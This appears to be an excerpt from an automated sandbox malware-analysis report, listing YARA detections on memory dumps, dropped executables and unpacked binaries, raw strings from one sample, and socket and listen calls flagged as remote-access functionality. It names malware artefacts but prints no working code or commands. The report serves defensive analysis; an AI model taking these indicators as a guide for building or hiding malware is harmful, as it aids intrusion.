Source: Yara match File source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003F.00000002.2927194723.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003F.00000002.2927194723.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003F.00000003.2863781739.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 76.2.1e8dfbd5c2.exe.3c99550.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 76.0.1e8dfbd5c2.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000004C.00000000.2507798493.0000000000992000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe, type: DROPPED
Source: Yara match File source: 7.2.k6Sly2p.exe.2a214e4.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 66.2.fbpbh.exe.33c0690.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 66.2.fbpbh.exe.33c0690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.k6Sly2p.exe.2a214e4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2464434325.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000042.00000002.2801612037.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000042.00000002.2801612037.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR
Source: afccf6841f.exe Binary or memory string: WIN_81
Source: afccf6841f.exe Binary or memory string: WIN_XP
Source: afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: afccf6841f.exe Binary or memory string: WIN_XPe
Source: afccf6841f.exe Binary or memory string: WIN_VISTA
Source: afccf6841f.exe Binary or memory string: WIN_7
Source: afccf6841f.exe Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match File source: 63.2.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.2.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.3.c1336f9f75.exe.a040000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.3.c1336f9f75.exe.a040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.3.c1336f9f75.exe.9ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.3.c1336f9f75.exe.9ff0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.2.c1336f9f75.exe.9ff0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 63.2.c1336f9f75.exe.9ff0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000003F.00000003.2863781739.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003F.00000002.2927194723.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003F.00000002.2927194723.0000000009FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000003F.00000003.2863781739.000000000A040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 76.2.1e8dfbd5c2.exe.3c99550.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 76.2.1e8dfbd5c2.exe.3c99550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 76.0.1e8dfbd5c2.exe.990000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000004C.00000000.2507798493.0000000000992000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 0000004C.00000002.2782844886.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe, type: DROPPED
Source: Yara match File source: 7.2.k6Sly2p.exe.2a214e4.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 66.2.fbpbh.exe.33c0690.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 66.2.fbpbh.exe.33c0690.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.k6Sly2p.exe.2a214e4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.2464434325.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000042.00000002.2801612037.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000042.00000002.2801612037.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F91204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 8_2_00F91204
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F91806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 8_2_00F91806